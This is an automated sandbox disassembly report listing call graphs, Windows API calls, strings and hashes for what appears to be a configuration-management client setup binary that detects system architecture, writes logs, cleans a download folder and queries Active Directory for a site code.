5f7332 RegOpenKeyExW 76256->76258 76258->76245 76259 5f731b 76259->76245 76260 5f66cd RegCloseKey 76259->76260 76261 5f7329 76260->76261 76261->76258 76263 5f669c __EH_prolog3 76262->76263 76264 5f6706 RegCloseKey 76263->76264 76265 5f66b0 76264->76265 76266 5f66ba RegCloseKey 76265->76266 76267 5f66c7 76265->76267 76266->76267 76267->75699 76268->75700 76269->76241 76271 5f671e 76270->76271 76272 5f6711 RegCloseKey 76270->76272 76271->76245 76273 5f66cd 76271->76273 76272->76271 76274 5f66d7 RegCloseKey 76273->76274 76275 5f66e2 RegOpenKeyExW 76273->76275 76274->76275 76275->76251 76276->76249 76277->76259 76279 6422b4 __EH_prolog3_catch_GS 76278->76279 76280 5f52cb 67 API calls 76279->76280 76281 6423ad 76280->76281 76404 64376c 76281->76404 76283 6423d5 76286 5f52cb 67 API calls 76283->76286 76289 642ed5 76283->76289 76285 64241c 76457 648930 442 API calls __EH_prolog3_catch_GS 76285->76457 76286->76289 76288 64242a 76290 6424bd 76288->76290 76291 64243a 76288->76291 76436 59f01d 76289->76436 76459 641581 437 API calls __EH_prolog3_catch 76290->76459 76299 64244e GetCurrentThreadId 76291->76299 76310 642472 76291->76310 76292 6423b3 76292->76285 76294 592624 269 API calls 76292->76294 76315 6423b8 76292->76315 76294->76285 76295 6424c6 76297 6424d2 76295->76297 76309 642537 76295->76309 76306 6424e6 GetCurrentThreadId 76297->76306 76297->76310 76299->76310 76300 59ef10 2 API calls 76302 642f2a 76300->76302 76301 642566 76304 64257c 76301->76304 76305 6425ca 76301->76305 76442 63bfaa 76302->76442 76303 592624 269 API calls 76336 6424a0 76303->76336 76313 642596 GetCurrentThreadId 76304->76313 76304->76315 76461 640d56 269 API calls __EH_prolog3_catch_GS 76305->76461 76306->76310 76309->76301 76460 64a73e 71 API calls 76309->76460 76310->76303 76313->76315 76315->76283 76456 5f0dba 6 API calls 76315->76456 76319 6425da 76320 64261e 76319->76320 76323 6425fa GetCurrentThreadId 76319->76323 76321 642680 76320->76321 76324 592624 269 API calls 76320->76324 76462 
649521 286 API calls __EH_prolog3_catch 76321->76462 76323->76320 76324->76321 76327 6426a9 76329 6426b5 76327->76329 76330 6426f9 76327->76330 76333 6426c8 GetCurrentThreadId 76329->76333 76329->76336 76332 642717 76330->76332 76345 642754 76330->76345 76332->76336 76339 64272c GetCurrentThreadId 76332->76339 76333->76336 76335 642918 76336->76283 76458 5f0dba 6 API calls 76336->76458 76339->76336 76341 642893 76341->76336 76344 6427a3 76344->76336 76345->76335 76345->76336 76345->76341 76345->76344 76346 6428d3 76345->76346 76357 642821 GetCurrentThreadId 76345->76357 76463 64a27e 284 API calls __EH_prolog3_catch_GS 76345->76463 76464 640801 282 API calls __EH_prolog3_catch 76345->76464 76465 5a0532 71 API calls 76345->76465 76346->76315 76357->76345 76385 57808e __EH_prolog3 76384->76385 76386 59ef10 2 API calls 76385->76386 76387 5780ab 76386->76387 76388 59ef10 2 API calls 76387->76388 76389 5780bf 76388->76389 76390 59ef10 2 API calls 76389->76390 76391 5780d5 76390->76391 76391->75732 76393 586ee8 76392->76393 76394 59ef96 76392->76394 76393->75742 76581 59e943 RtlFreeHeap VirtualFree 76394->76581 76396 59efa0 76397 5f3f60 2 API calls 76396->76397 76397->76393 76398->75738 76399->75711 76400->75725 76401->75743 76402->75736 76403->75738 76405 64377b __EH_prolog3_catch_GS 76404->76405 76472 62552c 76405->76472 76407 6437cf 76408 643829 76407->76408 76411 6437d5 76407->76411 76478 615014 76408->76478 76410 643836 76413 643890 76410->76413 76416 643842 76410->76416 76414 592624 269 API calls 76411->76414 76417 643809 76411->76417 76493 6492a2 76413->76493 76414->76417 76416->76417 76421 592624 269 API calls 76416->76421 76418 643820 76417->76418 76524 5f0dba 6 API calls 76417->76524 76418->76292 76419 6438ad 76420 6438bb 76419->76420 76424 6438e6 76419->76424 76525 64121f 287 API calls __EH_prolog3_catch 76420->76525 76421->76417 76422 59ef10 2 API calls 76425 64394c 76422->76425 76424->76422 76434 643985 76424->76434 76427 59ef10 2 API calls 76425->76427 76426 
6438df 76426->76424 76428 6438e3 76426->76428 76433 592624 269 API calls 76426->76433 76429 643961 76427->76429 76428->76424 76429->76417 76526 648b33 432 API calls __EH_prolog3_catch 76429->76526 76431 643973 76431->76417 76433->76428 76434->76417 76435 592624 269 API calls 76434->76435 76435->76417 76437 59f038 76436->76437 76438 59f027 76436->76438 76437->76300 76576 59e965 RtlFreeHeap VirtualFree 76438->76576 76440 59f031 76441 5f3f60 2 API calls 76440->76441 76441->76437 76443 63bfb6 __EH_prolog3 76442->76443 76577 65c1ab 76443->76577 76445 63bfc9 76446 59ef10 2 API calls 76445->76446 76447 63bfde 76446->76447 76448 59ef10 2 API calls 76447->76448 76449 63bff2 76448->76449 76456->76283 76457->76288 76458->76283 76459->76295 76460->76301 76461->76319 76462->76327 76463->76345 76464->76345 76465->76345 76473 625538 __EH_prolog3_catch 76472->76473 76527 61f559 76473->76527 76475 625571 76477 62558a 76475->76477 76548 5f0dba 6 API calls 76475->76548 76477->76407 76479 615020 __EH_prolog3_catch 76478->76479 76552 619dbf 76479->76552 76482 615078 76483 615084 GetCurrentThreadId 76482->76483 76484 6150a4 76482->76484 76483->76484 76490 6150ba 76484->76490 76558 5f0dba 6 API calls 76484->76558 76485 6150c3 76487 6150e2 76485->76487 76489 615110 76485->76489 76487->76484 76488 6150ee GetCurrentThreadId 76487->76488 76488->76484 76489->76484 76491 61514c 76489->76491 76490->76410 76491->76490 76559 5f0dba 6 API calls 76491->76559 76494 6492ae __EH_prolog3_catch 76493->76494 76495 6492da 76494->76495 76501 6492f6 76494->76501 76497 6492f1 76495->76497 76573 5f0dba 6 API calls 76495->76573 76497->76419 76498 64932a 76562 6406f3 76498->76562 76500 649335 76502 64938d LsaQueryInformationPolicy 76500->76502 76503 64933e 76500->76503 76501->76498 76504 592624 269 API calls 76501->76504 76505 6493e4 76502->76505 76506 64939f LsaNtStatusToWinError 76502->76506 76509 64934a GetCurrentThreadId 76503->76509 76511 64936d 76503->76511 76504->76498 76506->76505 76509->76511 
76524->76418 76525->76426 76526->76431 76528 61f565 __EH_prolog3_catch 76527->76528 76529 5f663a RegCloseKey 76528->76529 76530 61f56d 76529->76530 76531 61f593 76530->76531 76532 61f5ec 76530->76532 76537 61f5a6 GetCurrentThreadId 76531->76537 76543 61f5cc 76531->76543 76533 61f5f2 76532->76533 76534 61f62d 76532->76534 76538 61f605 GetCurrentThreadId 76533->76538 76533->76543 76535 5f7229 19 API calls 76534->76535 76536 61f644 76535->76536 76536->76543 76550 5f6bc9 7 API calls __EH_prolog3_catch 76536->76550 76537->76543 76538->76543 76541 5f6690 2 API calls 76544 61f69e 76541->76544 76542 61f660 76542->76543 76545 61f669 76542->76545 76546 61f5e3 76543->76546 76549 5f0dba 6 API calls 76543->76549 76544->76475 76545->76546 76551 5f0dba 6 API calls 76545->76551 76546->76541 76548->76477 76549->76546 76550->76542 76551->76546 76553 619dd1 76552->76553 76555 61506f 76552->76555 76560 6109e6 EnterCriticalSection __EH_prolog3_catch 76553->76560 76555->76482 76555->76485 76556 619ddf 76561 610a36 LeaveCriticalSection __EH_prolog3_catch 76556->76561 76558->76490 76559->76490 76560->76556 76561->76555 76563 6406ff __EH_prolog3_catch 76562->76563 76564 640721 76563->76564 76565 640772 LsaOpenPolicy 76563->76565 76568 640732 GetCurrentThreadId 76564->76568 76570 640755 76564->76570 76566 640791 LsaNtStatusToWinError 76565->76566 76565->76570 76567 64079b 76566->76567 76566->76570 76567->76570 76571 6407ac GetCurrentThreadId 76567->76571 76568->76570 76572 64076c 76570->76572 76575 5f0dba 6 API calls 76570->76575 76571->76570 76572->76500 76573->76497 76575->76572 76576->76440 76578 65c1b7 __EH_prolog3 76577->76578 76579 59ef10 2 API calls 76578->76579 76580 65c1d1 76579->76580 76580->76445 76581->76396 76583 5f4cdb __EH_prolog3_catch 76582->76583 76584 5f4d53 76583->76584 76585 5f4d02 76583->76585 76595 5f4a81 76584->76595 76588 5f4d13 GetCurrentThreadId 76585->76588 76589 5f4d3d 76585->76589 76588->76589 76592 5f4d4d 76589->76592 76599 5f0dba 6 API calls 76589->76599 
76601 5d21c0 RaiseException 76592->76601 76594 5f4d6a 76594->75754 76596 5f4a91 76595->76596 76602 5f4aa2 76596->76602 76598 5f4a9d 76598->76594 76600 5f0dba 6 API calls 76598->76600 76599->76592 76600->76594 76601->76594 76603 5f4ab4 76602->76603 76604 5f4ab8 76603->76604 76605 5f4ad6 76603->76605 76615 5f49d9 71 API calls 76604->76615 76606 5f4b3c 76605->76606 76607 5f4ae6 76605->76607 76616 5d0c66 67 API calls 2 library calls 76606->76616 76610 59ea94 71 API calls 76607->76610 76614 5f4ad4 76607->76614 76610->76614 76614->76598 76615->76614 76618 5f5dd3 __EH_prolog3_catch_GS 76617->76618 76619 5f5e6e 76618->76619 76620 5f5e17 76618->76620 76621 5facce 100 API calls 76619->76621 76623 5f5e2b GetCurrentThreadId 76620->76623 76624 5f5e55 76620->76624 76622 5f5e86 76621->76622 76627 5f5e8a 76622->76627 76639 5faaed 269 API calls __EH_prolog3_catch 76622->76639 76623->76624 76628 5f5e65 76624->76628 76638 5f0dba 6 API calls 76624->76638 76627->76628 76640 5f0dba 6 API calls 76627->76640 76634 5f5fdf 76628->76634 76641 5d21c0 RaiseException 76628->76641 76630 5f5ed5 76632 5f5ef4 GetCurrentThreadId 76630->76632 76633 5f5f5c 76630->76633 76636 5f5f21 76630->76636 76632->76636 76635 59f417 2 API calls 76633->76635 76634->75763 76635->76627 76636->76633 76637 592624 267 API calls 76636->76637 76637->76633 76638->76628 76639->76630 76640->76628 76641->76634 76642->75772 76643->75775 76644->75771 76645->75789 76646->75789 76647->75786 76648 635296 76649 6352a2 __EH_prolog3_catch 76648->76649 76650 66c86b 66 API calls 76649->76650 76651 63531a 76650->76651 76652 5f094c 269 API calls 76651->76652 76656 635335 76652->76656 76653 635376 76654 5f663a RegCloseKey 76653->76654 76655 635380 76654->76655 76658 635395 GetSystemTime 76655->76658 76656->76653 76657 592624 269 API calls 76656->76657 76657->76653 76659 5f7229 19 API calls 76658->76659 76660 6353fa 76659->76660 76661 63546c 76660->76661 76681 5f6fe7 82 API calls __EH_prolog3_catch 76660->76681 76663 63547b 76661->76663 
76685 5f0dba 6 API calls 76661->76685 76667 5f6690 2 API calls 76663->76667 76665 63540c 76682 5f6fe7 82 API calls __EH_prolog3_catch 76665->76682 76669 6354af 76667->76669 76668 635420 76671 5f52af 68 API calls 76668->76671 76670 6354be 76669->76670 76686 5f0b59 82 API calls 2 library calls 76669->76686 76673 66c86b 66 API calls 76670->76673 76675 635436 76671->76675 76676 6354ea 76673->76676 76674 635444 76683 5f6bc9 7 API calls __EH_prolog3_catch 76674->76683 76675->76674 76677 5f52cb 67 API calls 76675->76677 76677->76674 76679 635458 76684 5f6bc9 7 API calls __EH_prolog3_catch 76679->76684 76681->76665 76682->76668 76683->76679 76684->76661 76685->76663 76686->76670 76687 59c1fc 76688 59ef10 2 API calls 76687->76688 76689 59c20c 76688->76689 76690 58048f 76691 580493 76690->76691 76692 5804c4 76691->76692 76693 5f52af 68 API calls 76691->76693 76705 5804e8 76692->76705 76771 5a162c 76692->76771 76693->76692 76695 58056a 76696 59ef10 2 API calls 76695->76696 76697 58059d 76696->76697 76698 5805b2 76697->76698 76699 59ef10 2 API calls 76697->76699 76740 5a2aa8 76698->76740 76699->76698 76700 5f4ccf 76 API calls 76700->76705 76705->76695 76705->76700 76706 59ef10 RtlFreeHeap VirtualFree 76705->76706 76809 578f19 71 API calls 76705->76809 76706->76705 76707 5805d2 76708 59ef10 2 API calls 76707->76708 76709 5805fc 76708->76709 76710 58068f 76709->76710 76712 5f52af 68 API calls 76709->76712 76715 580738 76710->76715 76810 5b2fc1 472 API calls 76710->76810 76713 580623 76712->76713 76713->76710 76747 5b7119 76713->76747 76714 58069e 76714->76715 76716 5806a7 76714->76716 76719 58074a 76715->76719 76812 5f0dba 6 API calls 76715->76812 76717 5f646b 76 API calls 76716->76717 76730 5806d8 76717->76730 76721 59ef10 2 API calls 76719->76721 76722 5807ee 76721->76722 76724 59ef10 2 API calls 76722->76724 76723 5a162c 83 API calls 76723->76710 76726 5807ff 76724->76726 76725 58063c 76725->76715 76725->76723 76727 59ef10 2 API calls 76726->76727 76729 580810 76727->76729 

                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FB5A2
                                                                                          • GetSystemInfo.KERNEL32(?,00000000,000000FF,CCM::Utility::GetProcessorArchitecture,0000007C,005B5198,?,DetectPlatform,0000004C,005A6602,?,?,CcmSetupManifest::GetApplicableInstallList,00000148,005A57F2,?), ref: 005FB5FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB642
                                                                                          • GetModuleHandleW.KERNEL32(kernel32,x86), ref: 005FB6AD
                                                                                          • GetLastError.KERNEL32 ref: 005FB6BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB6F0
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005FB729
                                                                                          • GetProcAddress.KERNEL32(?,GetNativeSystemInfo), ref: 005FB736
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 005FB748
                                                                                          • GetLastError.KERNEL32 ref: 005FB756
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB78C
                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 005FB7AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB7FC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$AddressErrorInfoLastProcSystem$H_prolog3_catchHandleModuleNativeProcess
                                                                                          • String ID: qs$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(hKernel32 = GetModuleHandleW(L"kernel32")) != 0$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$0ts$CCM::Utility::GetProcessorArchitecture$FALSE$FALSE$GetNativeSystemInfo$IsWow64Process$Unknown system architecture %d$Unknown system architecture %d$amd64$ia64$kernel32$pfnIsWow64Process(GetCurrentProcess(), &bIsWow64)$x86
                                                                                          • API String ID: 1896194167-1866863839
                                                                                          • Opcode ID: 52994c73459db24b919b35fc5e0397b7a61c5cd4764ec42b4dbabab2403823dc
                                                                                          • Instruction ID: 437ffe9ffb73b0b5d8241632dddc53fbd58052c6aeb1801e02d671baa163ba9a
                                                                                          • Opcode Fuzzy Hash: 52994c73459db24b919b35fc5e0397b7a61c5cd4764ec42b4dbabab2403823dc
                                                                                          • Instruction Fuzzy Hash: A061E8B1A80319EAFF14AB61CC0ABBD7EA9BF84B54F148016F604B71C2DB7C4945C7A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F07A0: __EH_prolog3.LIBCMT ref: 005F07A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                          • GetCurrentThread.KERNEL32 ref: 005F0A79
                                                                                          • GetThreadTimes.KERNEL32(00000000), ref: 005F0A80
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005F0A8D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F0AF4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$Time$FileH_prolog3H_prolog3_catch_SystemTimes
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$Failed to load logging configuration for '%s' (%08lx)$PushThreadComponent(ComponentStackInfo)$hrq$pszComponentName != 0
                                                                                          • API String ID: 2110536068-644369641
                                                                                          • Opcode ID: 8c2899970d16359992539f42273bf18b457a4b3db19772a3e08d9b890fe8830f
                                                                                          • Instruction ID: 432300db722dd4324b943a17c61ad1ceefda293f907e800b6df0b649835a621a
                                                                                          • Opcode Fuzzy Hash: 8c2899970d16359992539f42273bf18b457a4b3db19772a3e08d9b890fe8830f
                                                                                          • Instruction Fuzzy Hash: 7A41D1B1D4526DAADB21DB648D4ABEEBEB8BB55304F045185F248632C2DAB84F84CF50
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057E42C
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0057E508
                                                                                            • Part of subcall function 00578174: FindClose.KERNEL32 ref: 00578183
                                                                                          • GetLastError.KERNEL32 ref: 0057E525
                                                                                          • DeleteFileW.KERNEL32(00000001,00000001,?,?), ref: 0057E58E
                                                                                          • GetLastError.KERNEL32(00000002), ref: 0057E5C3
                                                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 0057E5FE
                                                                                          • FindClose.KERNEL32(?,00000001,00000000), ref: 0057E6A6
                                                                                          Strings
                                                                                          • DeleteFilesFromDownloadFolder failed with error 0x%x, xrefs: 0057E67B
                                                                                          • CcmSetup::DeleteFilesFromDownloadFolder, xrefs: 0057E4D4
                                                                                          • Failed to delete file %s. Error %d, xrefs: 0057E5CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseErrorLast$DeleteFirstH_prolog3H_prolog3_catch_Next
                                                                                          • String ID: CcmSetup::DeleteFilesFromDownloadFolder$DeleteFilesFromDownloadFolder failed with error 0x%x$Failed to delete file %s. Error %d
                                                                                          • API String ID: 2780982994-501919274
                                                                                          • Opcode ID: 7747c4ffad4be6943f1908b153b91ba543c9bb37f541eb64d0cd148eb225dc78
                                                                                          • Instruction ID: 9106ff1e6c439d843dee182cd028f0be53da1aa70f2a255d72aefd18feed4a38
                                                                                          • Opcode Fuzzy Hash: 7747c4ffad4be6943f1908b153b91ba543c9bb37f541eb64d0cd148eb225dc78
                                                                                          • Instruction Fuzzy Hash: 7761AB71900249EAEF10EBA4CD4EBDEBFB9BF15314F104299E104A7182DBB45F49CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F10FA
                                                                                          • GetLocalTime.KERNEL32(?), ref: 005F1161
                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 005F116E
                                                                                          • _wcsrchr.LIBCMT ref: 005F11AA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F11F9
                                                                                          Strings
                                                                                          • <![LOG[%s]LOG]!><time="%02u:%02u:%02u.%03u%+03d" date="%02u-%02u-%04u" component="%s" context="%s" type="%u" thread="%lu" file="%s, xrefs: 005F125F
                                                                                          • %s:%lu, xrefs: 005F11C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$CurrentH_prolog3_catch_InformationLocalThreadZone_wcsrchr
                                                                                          • String ID: %s:%lu$<![LOG[%s]LOG]!><time="%02u:%02u:%02u.%03u%+03d" date="%02u-%02u-%04u" component="%s" context="%s" type="%u" thread="%lu" file="%s
                                                                                          • API String ID: 2050430538-2710396948
                                                                                          • Opcode ID: 8ab1c6dce60daf0e16d4d7701bfd5647adbe490adbb0e533195f6d0b576e0168
                                                                                          • Instruction ID: 31f94d2d3b3c31cf63740973b14279cb8266f977a1a8c105503d94b2be9657e9
                                                                                          • Opcode Fuzzy Hash: 8ab1c6dce60daf0e16d4d7701bfd5647adbe490adbb0e533195f6d0b576e0168
                                                                                          • Instruction Fuzzy Hash: F8410C7190156EEBCF25CFA5CD05BFE7BB9BB08710F044096BA48E6240E6389E90DF65
                                                                                          APIs
                                                                                          • HeapCreate.KERNEL32(00000000,00200000,00000000,?,?,?,?,005713AA), ref: 006158D2
                                                                                          • HeapQueryInformation.KERNEL32(?,00000000,?,00000004,00000000,?,?,?,?,005713AA), ref: 006158F4
                                                                                          • HeapSetInformation.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000004,00000000,?,?,?,?,005713AA), ref: 00615912
                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,005713AA), ref: 00615925
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Information$CreateProcessQuery
                                                                                          • String ID:
                                                                                          • API String ID: 444772348-0
                                                                                          • Opcode ID: d3d86f597078df3cc7eaf5ecab0582870be142dfc0d03d42b0c2ac6316e89bf3
                                                                                          • Instruction ID: deae85769d06b3d102195119888c87b9e1004bd75f32e3beb3b7affa712270e5
                                                                                          • Opcode Fuzzy Hash: d3d86f597078df3cc7eaf5ecab0582870be142dfc0d03d42b0c2ac6316e89bf3
                                                                                          • Instruction Fuzzy Hash: 2F0192B0500349FFEB208FA0DC85EA6FBADEB40361F18086EF586D3251D6724D40D761
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000064,00748784,00000000,?,00603441,008DCE2C,00000017,CCM::Utility::Wmi::Namespace::Open), ref: 0060402E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006422AF
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0063BF44: __EH_prolog3.LIBCMT ref: 0063BF4B
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064245F
                                                                                            • Part of subcall function 00641581: __EH_prolog3_catch.LIBCMT ref: 00641588
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006424F7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006425AB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064260B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006426DE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642741
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006427CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642837
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006428BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642981
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006429F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642A68
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642AC2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642B0F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642BBF
                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 006408F1
                                                                                            • Part of subcall function 00640801: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 0064090E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642C10
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642902
                                                                                            • Part of subcall function 00640801: __EH_prolog3_catch.LIBCMT ref: 00640808
                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 00640858
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642D12
                                                                                            • Part of subcall function 0064A27E: __EH_prolog3_catch_GS.LIBCMT ref: 0064A285
                                                                                            • Part of subcall function 0064A27E: GetCurrentThreadId.KERNEL32 ref: 0064A314
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642C68
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642E24
                                                                                          Strings
                                                                                          • GetStringFromColumn(&col, sSMSAssignedSite), xrefs: 00642C5E
                                                                                          • ..\lsad.cpp, xrefs: 00642B1B
                                                                                          • ..\lsad.cpp, xrefs: 00642C00
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642E1F
                                                                                          • ..\lsad.cpp, xrefs: 006426CE
                                                                                          • sSMSAssignedSite.length(), xrefs: 00642E1A
                                                                                          • ..\lsad.cpp, xrefs: 00642E30
                                                                                          • GetStringFromColumn(&col, sSiteCode), xrefs: 0064282D
                                                                                          • This client might be within the boundaries of more than one site - AD SiteCode search matched %d entries, xrefs: 00642D99
                                                                                          • ..\lsad.cpp, xrefs: 006425FB
                                                                                          • ..\lsad.cpp, xrefs: 00642827
                                                                                          • vecBoundaries.size() > 0, xrefs: 006425A1
                                                                                          • ..\lsad.cpp, xrefs: 00642D1E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642BBA
                                                                                          • ..\lsad.cpp, xrefs: 00642C1C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064297C
                                                                                          • ..\lsad.cpp, xrefs: 006428AD
                                                                                          • ..\lsad.cpp, xrefs: 00642ACE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642832
                                                                                          • Attempting to query AD for assigned site code, xrefs: 0064266F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006426D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006429F1
                                                                                          • ..\lsad.cpp, xrefs: 00642467
                                                                                          • Failed to get AD site name, xrefs: 00642527
                                                                                          • ..\lsad.cpp, xrefs: 00642731
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064273C
                                                                                          • hr != ((HRESULT)0x00005012L), xrefs: 00642B05
                                                                                          • LSGetSubnetBoundaries(vecBoundaries), xrefs: 00642455
                                                                                          • ..\lsad.cpp, xrefs: 006427D4
                                                                                          • ..\lsad.cpp, xrefs: 00642BC7
                                                                                          • ..\lsad.cpp, xrefs: 006426E6
                                                                                          • Failed to get assigned site code from AD. Error 0x%x, xrefs: 00642D4B
                                                                                          • ..\lsad.cpp, xrefs: 006428F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642C0B
                                                                                          • ..\lsad.cpp, xrefs: 00642AFF
                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszSiteObjectAttr, dwSiteObjectAttrCount, sSubnetSearchFilter ), xrefs: 00642A5E
                                                                                          • ..\lsad.cpp, xrefs: 00642D02
                                                                                          • ..\lsad.cpp, xrefs: 006424FF
                                                                                          • spSearch->GetColumn(hSearch, c_smsSMSSiteCode, &col), xrefs: 006427C2
                                                                                          • ..\lsad.cpp, xrefs: 006427BC
                                                                                          • LSGetADSiteName(sADSite), xrefs: 006424ED
                                                                                          • ..\lsad.cpp, xrefs: 0064259B
                                                                                          • ..\lsad.cpp, xrefs: 006425B7
                                                                                          • LSGetAssignedSiteFromAD, xrefs: 0064240B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006427C7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642606
                                                                                          • hr = spSearch->GetNextRow(hSearch), xrefs: 006428B3
                                                                                          • ..\lsad.cpp, xrefs: 00642AB2
                                                                                          • msSMSSiteCode, xrefs: 006422EB, 0064268E, 00642788
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006428B8
                                                                                          • LSGetAssignedSiteFromAD : Trying to Assign to the Site <%s>, xrefs: 00642E70
                                                                                          • ..\lsad.cpp, xrefs: 00642A58
